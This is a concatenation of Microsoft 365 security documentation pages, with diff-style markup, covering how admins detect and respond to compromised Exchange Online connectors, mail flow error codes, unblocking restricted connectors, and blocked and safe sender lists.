-# Respond to a compromised connector
--
-Connectors are used for enabling mail flow between Microsoft 365 and email servers that you have in your on-premises environment. For more information, see [Configure mail flow using connectors in Exchange Online](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/use-connectors-to-configure-mail-flow).
-
-An inbound connector with the **Type** value `OnPremises` is considered compromised when an attacker creates a new connector or modifies and existing connector to send spam or phishing email.
-
-This article explains the symptoms of a compromised connector and how to regain control of it.
-
-## Symptoms of a compromised connector
-
-A compromised connector exhibits one or more of the following characteristics:
--- A sudden spike in outbound mail volume.-- A mismatch between the `5321.MailFrom` address (also known as the **MAIL FROM** address, P1 sender, or envelope sender) and the `5322.From` address (also known as the From address or P2 sender) in outbound email. For more information about these senders, see [How EOP validates the From address to prevent phishing](anti-phishing-from-email-address-validation.md#an-overview-of-email-message-standards).-- Outbound mail sent from a domain that isn't provisioned or registered.-- The connector is blocked from sending or relaying mail.-- The presence of an inbound connector that wasn't created by an admin.-- Unauthorized changes in the configuration of an existing connector (for example, the name, domain name, and IP address).-- A recently compromised admin account. Creating or editing connectors requires admin access.-
-If you see these symptoms or other unusual symptoms, you should investigate.
-
-## Secure and restore email function to a suspected compromised connector
-
-Do **all** of the following steps to regain control of the connector. Go through the steps as soon as you suspect a problem and as quickly as possible to make sure that the attacker doesn't resume control of the connector. These steps also help you remove any back-door entries that the attacker might have added to the connector.
-
-### Step 1: Identify if an inbound connector has been compromised
-
-#### Review recent suspicious connector traffic or related messages
-
-In [Microsoft Defender for Office 365 Plan 2](mdo-about.md), open the Microsoft Defender portal at <https://security.microsoft.com> and go to **Explorer**. Or, to go directly to the **Explorer** page, use <https://security.microsoft.com/threatexplorer>.
-
-1. On the **Explorer** page, verify that the **All email** tab is selected and then configure the following options:
- - Select the date/time range.
- - Select **Connector**.
- - Enter the connector name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box.
- - Select **Refresh**.
-
- :::image type="content" source="../../media/connector-compromise-explorer.png" alt-text="Inbound connector explorer view" lightbox="../../media/connector-compromise-explorer.png":::
-
-2. Look for abnormal spikes or dips in email traffic.
-
- :::image type="content" source="../../media/connector-compromise-abnormal-spike.png" alt-text="Number of emails delivered to junk folder" lightbox="../../media/connector-compromise-abnormal-spike.png":::
-
-3. Answer the following questions:
- - Does the **Sender IP** match your organization's on-premises IP address?
- - Were a significant number of recent messages sent to the **Junk Email** folder? This result clearly indicates that a compromised connector was used to send spam.
- - Is it reasonable for the message recipients to receive email from senders in your organization?
-
- :::image type="content" source="../../media/connector-compromise-sender-ip.png" alt-text="Sender IP and your organization's on-prem IP address" lightbox="../../media/connector-compromise-sender-ip.png":::
-
-In [Microsoft Defender for Office 365](mdo-about.md) or [Exchange Online Protection](eop-about.md), use **Alerts** and **Message trace** to look for the symptoms of connector compromise:
-
-1. Open the Defender portal at <https://security.microsoft.com> and go to **Incidents & alerts** \> **Alerts**. Or, to go directly to the **Alerts** page, useOpen **Suspicious connector activity** alert in <https://security.microsoft.com/alerts>.
-
-2. On the **Alerts** page, use the :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** \> **Policy** \> **Suspicious connector activity** to find any alerts related to suspicious connector activity.
-
-3. Select a suspicious connector activity alert by clicking anywhere in the row other than the check box next to the name. On the details page that opens, select an activity under **Activity list**, and copy the **Connector domain** and **IP address** values from the alert.
-
- :::image type="content" source="../../media/connector-compromise-outbound-email-details.png" alt-text="Connector compromise outbound email details" lightbox="../../media/connector-compromise-outbound-email-details.png":::
-
-4. Open the Exchange admin center at <https://admin.exchange.microsoft.com> and go to **Mail flow** \> **Message trace**. Or, to go directly to the **Message trace** page, use <https://admin.exchange.microsoft.com/#/messagetrace>.
-
- On the **Message trace** page, select the **Custom queries** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Start a trace**, and use the **Connector domain** and **IP address** values from the previous step.
-
- For more information about message trace, see [Message trace in the modern Exchange admin center in Exchange Online](/exchange/monitoring/trace-an-email-message/message-trace-modern-eac).
-
- :::image type="content" source="../../media/connector-compromise-new-message-trace.png" alt-text="New message trace flyout" lightbox="../../media/connector-compromise-new-message-trace.png":::
-
-5. In the message trace results, look for the following information:
- - A significant number of messages were recently marked as **FilteredAsSpam**. This result clearly indicates that a compromised connector was used to send spam.
- - Whether it's reasonable for the message recipients to receive email from senders in your organization
-
- :::image type="content" source="../../media/connector-compromise-message-trace-results.png" alt-text="New message trace search results" lightbox="../../media/connector-compromise-message-trace-results.png":::
-
-#### Investigate and validate connector-related activity
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), replace \<StartDate\> and \<EndDate\> with your values, and then run the following command to find and validate admin-related connector activity in the audit log. For more information, see [Use a PowerShell script to search the audit log](/purview/audit-log-search-script).
-
-```powershell
-Search-UnifiedAuditLog -StartDate "<ExDateTime>" -EndDate "<ExDateTime>" -Operations "New-InboundConnector","Set-InboundConnector","Remove-InboundConnector
-```
-
-For detailed syntax and parameter information, see [Search-UnifiedAuditLog](/powershell/module/exchange/search-unifiedauditlog).
-
-### Step 2: Review and revert unauthorized change(s) in a connector
-
-Open the Exchange admin center at <https://admin.exchange.microsoft.com> and go to **Mail flow** \> **Connectors**. Or, to go directly to the **Connectors** page, use <https://admin.exchange.microsoft.com/#/connectors>.
-
-On the **Connectors** page, review the list of connectors. Remove or turn off any unknown connectors, and check each connector for unauthorized configuration changes.
-
-### Step 3: Unblock the connector to re-enable mail flow
-
-After you've regained control of the compromised connector, unblock the connector on the **Restricted entities** page in the Defender portal. For instructions, see [Remove blocked connectors from the Restricted entities page](connectors-remove-blocked.md).
-
-### Step 4: Investigate and remediate potentially compromised admin accounts
-
-After you identify the admin account that was responsible for the unauthorized connector configuration activity, investigate the admin account for compromise. For instructions, see [Responding to a Compromised Email Account](responding-to-a-compromised-email-account.md).
-
-## More information
--- [Remove blocked connectors](connectors-remove-blocked.md)-- [Remove blocked users](outbound-spam-restore-restricted-users.md)
security Connectors Mail Flow Intelligence https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/connectors-mail-flow-intelligence.md
- Title: Mail flow intelligence
- - NOCSH
-----
- - MET150
-description: Admins can learn about the error codes that are associated with message delivery using connectors (also known as mail flow intelligence).
---- m365-security-- tier2 Previously updated : 6/14/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Mail flow intelligence in EOP
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, you typically use a connector to route email messages from EOP to your on-premises email environment. You might also use a connector to route messages from Microsoft 365 to a partner organization. When Microsoft 365 can't deliver these messages via the connector, they're queued in Microsoft 365. Microsoft 365 continues to retry delivery for each message for 24 hours. After 24 hours, the queued message expires, and the message is returned to the original sender in a non-delivery report (also known as an NDR or bounce message).
-
-Microsoft 365 generates an error when a message can't be delivered by using a connector. The most common errors and their solutions are described in this article. Collectively, queuing and notification errors for undeliverable messages sent via connectors is known as _mail flow intelligence_.
-
-## Error code: 450 4.4.312 DNS query failed
-
-Microsoft 365 tried to connect to the smart host that's specified in the connector, but the DNS query to find the smart host's IP addresses failed. The possible causes for this error are:
--- There's an issue with your domain's DNS hosting service (the party that maintains the authoritative name servers for your domain).-- Your domain has recently expired, so the MX record can't be retrieved.-- Your domain's MX record has recently changed, and the DNS servers still have previously cached DNS information for your domain.-
-### How do I fix error code 450 4.4.312?
--- Work with your DNS hosting service to identify and fix the problem with your domain.-- If the error is from a partner organization (for example, a third party cloud service provider), contact the partner to fix the issue.-
-## Error code: 450 4.4.315 Connection timed out
-
-Microsoft 365 can't connect to the destination email server. The error details explain the problem. For example:
--- Your on-premises email server is down.-- There's an error in the connector's smart host settings, so Microsoft 365 is trying to connect to the wrong IP address.-
-### How do I fix error code 450 4.4.315?
--- Find out which scenario applies to you, and make the necessary corrections. For example, if mail flow is working correctly, and you haven't changed the connector settings, check your on-premises email environment to see if the server is down, or if there were changes to your network infrastructure (for example, you changed internet service providers, so you now have different IP addresses).-- If the error is from a partner organization (for example, a third party cloud service provider), contact the partner to fix the issue.-
-## Error code: 450 4.4.316 Connection refused
-
-Microsoft 365 encountered a connection error when it tried to connect to the destination email server. A likely cause for this error is your firewall is blocking connections from Microsoft 365 IP addresses. Or, this error might be by design if you've migrated your on-premises email system to Microsoft 365 and shut down your on-premises email environment.
-
-### How do I fix error code 450 4.4.316?
--- If you have mailboxes in your on-premises environment, modify your firewall settings to allow connections from Microsoft 365 IP addresses on TCP port 25 to your on-premises email servers. For a list of the Microsoft 365 IP addresses, see [Microsoft 365 URLs and IP address ranges](/microsoft-365/enterprise/urls-and-ip-address-ranges).--- If no more messages should be delivered to your on-premises environment, select **Fix now** in the alert so Microsoft 365 can immediately reject the messages with invalid recipients. This action reduces the risk of exceeding your organization's quota for invalid recipients, which could impact normal message delivery. Or, use the following instructions to manually fix the issue:-
- - Disable or delete the connector that delivers email from Microsoft 365 to your on-premises email environment:
-
- 1. In the EAC at <https://admin.exchange.microsoft.com>, go to **Mail flow** \> **Connectors**. Or, to go directly to the **Connectors** page, use <https://admin.exchange.microsoft.com/#/connectors>.
-
- 2. On the **Connectors** page, delete or disable the connector with the **From** value **Office 365** and the **To** value **Your organization's email server** by doing one of the following steps:
-
- - Select the connector from the list by selecting the round check box that appears next to the **Status** column.
- 1. Select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears.
- 2. In the confirmation flyout that opens, select **Confirm**.
-
- - Select the connector from the list by clicking anywhere in the row other than the round check box that appears next to the **Status** column. In the connector details flyout that opens, do either of the following actions:
- - Delete the connector by selecting :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** at the top of the flyout, and then select **Confirm** in the confirmation flyout that opens.
- - Disable the connector by selecting :::image type="icon" source="../../media/m365-cc-sc-disable-icon.png" border="false"::: **Disable** at the top of the flyout, and then select **Confirm** in the confirmation flyout that opens.
-
- - In Microsoft 365, change the accepted domain that's associated with your on-premises email environment from **Internal Relay** to **Authoritative**. For instructions, see [Manage accepted domains in Exchange Online](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).
--- If the error is from a partner organization (for example, a third party cloud service provider), contact the partner to fix the issue.-
-> [!NOTE]
-> Typically, these changes take between 30 minutes and one hour to take effect. After one hour, verify that you no longer receive the error.
-
-## Error code: 450 4.4.317 Cannot connect to remote server
-
-Microsoft 365 connected to the destination email server, but the server responded with an immediate error or doesn't meet the connection requirements. The error details explain the problem. For example:
--- The destination email server responded with a "Service not available" error, which indicates the server is unable to maintain communication with Microsoft 365.-- The connector is configured to require TLS, but the destination email server doesn't support TLS.-
-### How do I fix error code 450 4.4.317?
--- Verify the TLS settings and certificates on your on-premises email servers and the TLS settings on the connector.-- If the error is from a partner organization (for example, a third party cloud service provider), contact the partner to fix the issue.-
-## Error code: 450 4.4.318 Connection was closed abruptly
-
-Microsoft 365 is having difficulty communicating with your on-premises email environment, so the connection was dropped. Possible causes for this error are:
--- Your firewall uses SMTP packet examination rules, and those rules aren't working correctly.-- Your on-premises email server isn't working correctly (for example, service hangs, crashes, or low system resources), which is causing the server to time out and close the connection to Microsoft 365.-- There are network issues between your on-premises environment and Microsoft 365.-
-### How do I fix error code 450 4.4.318?
--- Find out which scenario applies to you, and make the necessary corrections.-- If the problem is caused by network issues between your on-premises environment and Microsoft 365, contact your network team to troubleshoot the issue.-- If the error is from a partner organization (for example, a third party cloud service provider), contact the partner to fix the issue.-
-## Error code: 450 4.7.320 Certificate validation failed
-
-Microsoft 365 encountered an error while trying to validate the certificate of the destination email server. The error details explain the error. For example:
--- Certificate expired.-- Certificate subject mismatch.-- Certificate is no longer valid.-
-### How do I fix error code 450 4.7.320?
--- Fix the certificate or the settings on the connector so that queued messages in Microsoft 365 can be delivered.-- If the error is from a partner organization (for example, a third party cloud service provider), contact the partner to fix the issue.-
-## Other error codes
-
-Microsoft 365 is having difficulty delivering messages to your on-premises or partner email server. Use the **Destination server** information in the error to examine the issue in your environment, or modify the connector if there's a configuration error.
-
-If the error is from a partner organization (for example, a third party cloud service provider), contact the partner to fix the issue.
security Connectors Remove Blocked https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/connectors-remove-blocked.md
- Title: Remove blocked connectors from the Restricted entities page in Microsoft 365
- - NOCSH
-----
- - m365-security
- - tier2
-
-description: Admins can learn how to remove connectors from the Restricted entities page in the Microsoft Defender portal. Connectors are added to the Restricted entities page after signs of compromise.
- Previously updated : 6/14/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Remove blocked connectors from the Restricted entities page
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, several things happen if an [inbound connector](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/use-connectors-to-configure-mail-flow) is detected as potentially compromised:
--- The connector is prevented from sending or relaying email.-- The connector is added to the **Restricted entities** page in the Microsoft Defender portal.-
- A _restricted entity_ is a **user account** or a **connector** that's blocked from sending email due to indications of compromise, which typically includes exceeding message receiving and sending limits.
--- If the connector is used to send email, the message is returned in a non-delivery report (also known as an NDR or bounced message) with the error code `550;5.7.711` and the following text:-
-> Your message couldn't be delivered. The most common reason for this is that your organization's email connector is suspected of sending spam or phish and it's no longer allowed to send email. Contact your email admin for assistance. Remote Server returned '550;5.7.711 Access denied, bad inbound connector. AS(2204).'
-
-For more information about compromised connectors and how to regain control of them, see [Respond to a compromised connector](connectors-detect-respond-to-compromise.md).
-
-The procedures in this article explain how admins can remove connectors from the **Restricted entities** page in the Microsoft Defender portal or in Exchange Online PowerShell.
-
-For more information about compromised _user accounts_ and how to remove them from the **Restricted entities** page, see [Remove blocked users from the Restricted entities page](outbound-spam-restore-restricted-users.md).
-
-## What do you need to know before you begin?
--- Open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Restricted entities** page, use <https://security.microsoft.com/restrictedentities>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Detection tuning (manage)** or **Authorization and settings/Security settings/Core security settings (read)**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - _Remove connectors from the Restricted entities page_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - _Read-only access to the Restricted entities page_: Membership in the **Global Reader**, **Security Reader**, or **View-Only Organization Management** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- Before you follow the procedures in this article to remove a connector from the **Restricted entities** page, be sure to follow the required steps to regain control of the connector as described in [Respond to a compromised connector](connectors-detect-respond-to-compromise.md).-
-## Remove a connector from the Restricted entities page in the Microsoft Defender portal
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Review** \> **Restricted entities**. Or, to go directly to the **Restricted entities** page, use <https://security.microsoft.com/restrictedentities>.
-
-2. On the **Restricted entities** page, identify the connector to unblock. The **Entity** value is **Connector**.
-
- Select a column header to sort by that column.
-
- To change the list of entities from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
- Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific connectors.
-
-3. Select the connector to unblock by selecting the check box for the entity, and then selecting the **Unblock** action that appears on the page.
-
-4. In the **Unblock entity** flyout that opens, read the details about the restricted connector. You should go through the recommendations to ensure you're taking the proper actions in case the connector is compromised.
-
- When you're finished in the **Unblock entity** flyout, select **Unblock**.
-
- > [!NOTE]
- > It might take up to 1 hour for all restrictions to be removed from the connector.
-
-## Verify the alert settings for restricted connectors
-
-The default alert policy named **Suspicious connector activity** automatically notifies admins when connectors are blocked from relaying email. For more information about alert policies, see [Alert policies in the Microsoft Defender portal](alert-policies-defender-portal.md).
-
-> [!IMPORTANT]
-> For alerts to work, audit logging must be turned on (it's on by default). To verify that audit logging is turned on or to turn it on, see [Turn auditing on or off](/purview/audit-log-enable-disable).
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Alert policy**. Or, to go directly to the **Alert policy** page, use <https://security.microsoft.com/alertpoliciesv2>.
-
-2. On the **Alert policy** page, find the alert named **Suspicious connector activity**. You can sort the alerts by name, or use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find the alert.
-
- Select the **Suspicious connector activity** alert by clicking anywhere in the row other than the check box next to the name.
-
-3. In the **Suspicious connector activity** flyout that opens, verify or configure the following settings:
- - **Status**: Verify the alert is turned on :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::.
- - Expand the **Set your recipients section** and verify the **Recipients** and **Daily notification limit** values.
-
- To change the values, select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit recipient settings** in the section or select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit policy** at the top of the flyout.
-
- - On the **Decide if you want to notify people when this alert is triggered** page of the wizard that opens, verify or change the following settings:
- - Verify **Opt-in for email notifications** is selected.
- - **Email recipients**: The default value is **TenantAdmins** (meaning, **Global Administrator** members). To add more recipients, click in the empty area of the box. A list of recipients appears, and you can start typing a name to filter and select a recipient. Remove an existing recipient from the box by selecting :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to their name.
- - **Daily notification limit**: The default value is **No limit**.
-
- When you're finished on the **Decide if you want to notify people when this alert is triggered** page, select **Next**.
-
- - On the **Review your settings** page, select **Submit**, and then select **Done**.
-
-4. Back in the **Suspicious connector activity** flyout, select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: at the top of the flyout.
-
-## Use Exchange Online PowerShell to view and remove connectors from the Restricted entities page
-
-To view the list of connectors that are restricted from sending email, run the following command in [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell):
-
-```powershell
-Get-BlockedConnector
-```
-
-To view details about a specific blocked connector, replace \<ConnectorID\> with the GUID value of the connector, and then run the following command:
-
-```powershell
-Get-BlockedConnector -ConnectorId <ConnectorID> | Format-List
-```
-
-For detailed syntax and parameter information, see [Get-BlockedConnector](/powershell/module/exchange/get-blockedconnector).
-
-To remove a connector from the Restricted entities list, replace \<ConnectorID\> with the GUID value of the connector, and then run the following command:
-
-```powershell
-Remove-BlockedConnector -ConnectorId <ConnectorID>
-```
-
-For detailed syntax and parameter information, see [Remove-BlockedConnector](/powershell/module/exchange/remove-blockedconnector).
-
-## More information
--- [Respond to a compromised connector](connectors-detect-respond-to-compromise.md)-- [Remove blocked users](outbound-spam-restore-restricted-users.md)
security Create Block Sender Lists In Office 365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/create-block-sender-lists-in-office-365.md
- Title: Create blocked sender lists
- - NOCSH
------- m365-security-- tier2
- - MET150s
-description: Admins can learn about the available and preferred options to block inbound messages in Exchange Online Protection (EOP).
- Previously updated : 6/14/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Create blocked sender lists in EOP
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, EOP offers multiple ways of blocking email from unwanted senders. Collectively, you can think of these options as _blocked sender lists_.
-
-The available blocked sender lists are described in the following list in order from most recommended to least recommended:
-
-1. Block entries for domains and email addresses (including spoofed senders) in the Tenant Allow/Block List.
-2. Outlook Blocked Senders (the Blocked Senders list that's stored in each mailbox).
-3. Blocked sender lists or blocked domain lists (anti-spam policies).
-4. Mail flow rules (also known as transport rules).
-5. The IP Block List (connection filtering).
-
-The rest of this article contains specifics about each method.
-
-> [!NOTE]
-> Always submit messages in your blocked sender lists to Microsoft for analysis. For instructions, see [Report questionable email to Microsoft](submissions-admin.md#report-questionable-email-to-microsoft). If the messages or message sources are determined to be harmful, Microsoft can automatically block the messages, and you won't need to manually maintain the entry in blocked sender lists.
->
-> Instead of blocking email, you also have several options to allow email from specific sources using _safe sender lists_. For more information, see [Create safe sender lists](create-safe-sender-lists-in-office-365.md).
-
-## Email message basics
-
-A standard SMTP email message consists of a _message envelope_ and message content. The message envelope contains information that's required for transmitting and delivering the message between SMTP servers. The message content contains message header fields (collectively called the _message header_) and the message body. The message envelope is described in RFC 5321, and the message header is described in RFC 5322. Recipients never see the actual message envelope because it's generated by the message transmission process, and it isn't actually part of the message.
--- The `5321.MailFrom` address (also known as the **MAIL FROM** address, P1 sender, or envelope sender) is the email address that's used in the SMTP transmission of the message. This email address is typically recorded in the **Return-Path** header field in the message header (although it's possible for the sender to designate a different **Return-Path** email address). If the message can't be delivered, it's the recipient for the non-delivery report (also known as an NDR or bounce message).--- The `5322.From` address (also known as the **From** address or P2 sender) is the email address in the **From** header field, and is the sender's email address that's displayed in email clients.-
-Frequently, the `5321.MailFrom` and `5322.From` addresses are the same (person-to-person communication). However, when email is sent on behalf of someone else, the addresses can be different.
-
-Blocked sender lists and blocked domain lists in anti-spam policies in EOP inspect only the `5322.From` addresses. This behavior is similar to Outlook Blocked Senders that use the `5322.From` address.
-
-## Use block entries in the Tenant Allow/Block List
-
-Our number one recommended option for blocking mail from specific senders or domains is the Tenant Allow/Block List. For instructions, see [Create block entries for domains and email addresses](tenant-allow-block-list-email-spoof-configure.md#create-block-entries-for-domains-and-email-addresses) and [Create block entries for spoofed senders](tenant-allow-block-list-email-spoof-configure.md#create-block-entries-for-spoofed-senders).
-
-Email messages from these senders are marked as _high confidence spam_ (SCL = 9). What happens to the messages is determined by the [anti-spam policy](anti-spam-policies-configure.md) that detected the message for the recipient. In the default anti-spam policy and new custom policies, messages that are marked as high confidence spam are delivered to the Junk Email folder by default. In Standard and Strict [preset security policies](preset-security-policies.md), high confidence spam messages are quarantined.
-
-As an added benefit, users in the organization can't send email to these blocked domains and addresses. They'll receive the following non-delivery report (also known as an NDR or bounce message): `550 5.7.703 Your message can't be delivered because messages to XXX, YYY are blocked by your organization using Tenant Allow Block List.` The entire message is blocked for all internal and external recipients of the message, even if only one recipient email address or domain is defined in a block entry.
-
-Only if you can't use the Tenant Allow/Block List for some reason should you consider using a different method to block senders.
-
-## Use Outlook Blocked Senders
-
-When only a small number of users received unwanted email, users or admins can add the sender email addresses to the Blocked Senders list in the mailbox. For instructions, see [Configure junk email settings on Exchange Online mailboxes](configure-junk-email-settings-on-exo-mailboxes.md).
-
-When messages are successfully blocked due to a user's Blocked Senders list, the **X-Forefront-Antispam-Report** header field will contain the value `SFV:BLK`.
-
-> [!NOTE]
-> If the unwanted messages are newsletters from a reputable and recognizable source, unsubscribing from the email is another option to stop the user from receiving the messages.
-
-## Use blocked sender lists or blocked domain lists
-
-When multiple users are affected, the scope is wider, so the next best option is blocked sender lists or blocked domain lists in anti-spam policies. Messages from senders on the lists are marked as **High confidence spam**, and the action that you've configured for the **High Confidence Spam** filter verdict is taken on the messages. For more information, see [Configure anti-spam policies](anti-spam-policies-configure.md).
-
-The maximum limit for these lists is approximately 1000 entries.
-
-## Use mail flow rules
-
-Mail flow rules can also look for keywords or other properties in the unwanted messages.
-
-Regardless of the conditions or exceptions that you use to identify the messages, you configure the action to set the spam confidence level (SCL) of the message to 9, which marks the message as **High confidence spam**. For more information, see [Use mail flow rules to set the SCL in messages](/exchange/security-and-compliance/mail-flow-rules/use-rules-to-set-scl).
-
-> [!IMPORTANT]
-> It's easy to create rules that are _overly_ aggressive, so it's important that you identify only the messages you want to block using very specific criteria. Also, be sure to [monitor the usage of the rule](/exchange/security-and-compliance/mail-flow-rules/manage-mail-flow-rules#monitor-rule-usage) to ensure everything works as expected.
-
-## Use the IP Block List
-
-When it's not possible to use one of the other options to block a sender, _only then_ should you use the IP Block List in the connection filter policy. For more information, see [Configure the connection filter policy](connection-filter-policies-configure.md). It's important to keep the number of blocked IPs to a minimum, so blocking entire IP address ranges is _not_ recommended.
-
-You should _especially_ avoid adding IP address ranges that belong to consumer services (for example, outlook.com) or shared infrastructures, and also ensure that you review the list of blocked IP addresses as part of regular maintenance.
security Create Safe Sender Lists In Office 365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365.md
- Title: Create safe sender lists
- - NOCSH
------- m365-security-- tier2
- - MET150s
-
- - seo-marvel-apr2020
-description: Admins can learn about the available and preferred options to allow inbound messages in Exchange Online Protection (EOP).
- Previously updated : 6/14/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Create safe sender lists in EOP
--
-If you're a Microsoft 365 customer with mailboxes in Exchange Online or a standalone Exchange Online Protection (EOP) customer without Exchange Online mailboxes, EOP offers multiple ways of ensuring that users receive email from trusted senders. Collectively, you can think of these options as _safe sender lists_.
-
-The available safe sender lists are described in the following list in order from most recommended to least recommended:
-
-1. Allow entries for domains and email addresses (including spoofed senders) in the Tenant Allow/Block List.
-2. Mail flow rules (also known as transport rules).
-3. Outlook Safe Senders (the Safe Senders list that's stored in each mailbox that affects only that mailbox).
-4. IP Allow List (connection filtering)
-5. Allowed sender lists or allowed domain lists (anti-spam policies)
-
-The rest of this article contains specifics about each method.
-
-> [!IMPORTANT]
-> Messages that are identified as malware<sup>\*</sup> or high confidence phishing are always quarantined, regardless of the safe sender list option that you use. For more information, see [Secure by default in Office 365](secure-by-default.md).
->
-> <sup>\*</sup> Malware filtering is skipped on SecOps mailboxes that are identified in the advanced delivery policy. For more information, see [Configure the advanced delivery policy for third-party phishing simulations and email delivery to SecOps mailboxes](advanced-delivery-policy-configure.md).
->
-> Be careful to closely monitor _any_ exceptions that you make to spam filtering using safe sender lists.
->
-> Always submit messages in your safe sender lists to Microsoft for analysis. For instructions, see [Report good email to Microsoft](submissions-admin.md#report-good-email-to-microsoft). If the messages or message sources are determined to be benign, Microsoft can automatically allow the messages, and you won't need to manually maintain the entry in safe sender lists.
->
-> Instead of allowing email, you also have several options to block email from specific sources using _blocked sender lists_. For more information, see [Create block sender lists in EOP](create-block-sender-lists-in-office-365.md).
-
-## Use allow entries in the Tenant Allow/Block List
-
-Our number one recommended option for allowing mail from senders or domains is the Tenant Allow/Block List. For instructions, see [Create allow entries for domains and email addresses](tenant-allow-block-list-email-spoof-configure.md#create-allow-entries-for-domains-and-email-addresses) and [Create allow entries for spoofed senders](tenant-allow-block-list-email-spoof-configure.md#create-allow-entries-for-spoofed-senders).
-
-Only if you can't use the Tenant Allow/Block List for some reason should you consider using a different method to allow senders.
-
-## Use mail flow rules
-
-> [!NOTE]
-> You can't use message headers and mail flow rules to designate an internal sender as a safe sender. The procedures in this section work for external senders only.
-
-Mail flow rules in Exchange Online and standalone EOP use conditions and exceptions to identify messages, and actions to specify what should be done to those messages. For more information, see [Mail flow rules (transport rules) in Exchange Online](/Exchange/security-and-compliance/mail-flow-rules/mail-flow-rules).
-
-The following example assumes you need email from contoso.com to skip spam filtering. To do this, configure the following settings:
-
-1. **Condition**: **The sender** \> **domain is** \> contoso.com.
-
-2. Configure either of the following settings:
- - **Mail flow rule condition**: **The message headers** \> **includes any of these words**:
- - **Header name**: `Authentication-Results`
- - **Header value**: `dmarc=pass` or `dmarc=bestguesspass` (add both values).
-
- This condition checks the email authentication status of the sending email domain to ensure that the sending domain isn't being spoofed. For more information about email authentication, see [SPF](email-authentication-spf-configure.md), [DKIM](email-authentication-dkim-configure.md), and [DMARC](email-authentication-dmarc-configure.md).
-
